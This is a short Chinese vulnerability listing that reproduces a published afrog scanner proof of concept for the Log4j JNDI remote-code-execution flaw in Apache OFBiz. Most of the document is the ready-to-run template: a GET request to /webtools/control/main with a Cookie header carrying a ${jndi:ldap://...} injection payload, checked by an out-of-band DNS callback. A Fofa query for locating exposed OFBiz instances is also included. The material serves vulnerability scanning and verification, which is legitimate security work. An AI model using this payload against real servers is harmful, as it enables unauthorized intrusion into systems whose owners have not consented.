apache-ofbiz-log4j-rce: Apache OFBiz Log4j JNDI RCE

日期: 2025-09-01 | 影响软件: apache ofbiz log4j rce | POC: 已公开

漏洞描述

Fofa: app="Apache_OFBiz"

PoC代码[已公开]

id: apache-ofbiz-log4j-rce

info:
  name: Apache OFBiz Log4j JNDI RCE
  author: pdteam
  severity: critical
  verified: true
  description: |
    Fofa: app="Apache_OFBiz"
  tags: apache,ofbiz,log4j,rce,jndi
  created: 2023/07/02

set:
  oob: oob()
  oobDNS: oob.DNS
rules:
  r0:
    request:
      method: GET
      path: /webtools/control/main
      headers:
        Cookie: OFBiz.Visitor=${jndi:ldap://{{oobDNS}}}
    expression: oobCheck(oob, oob.ProtocolDNS, 3)
expression: r0()
来源: https://github.com/zan8in/afrog/blob/main/pocs/afrog-pocs/vulnerability/apache-ofbiz-log4j-rce.yaml

相关漏洞推荐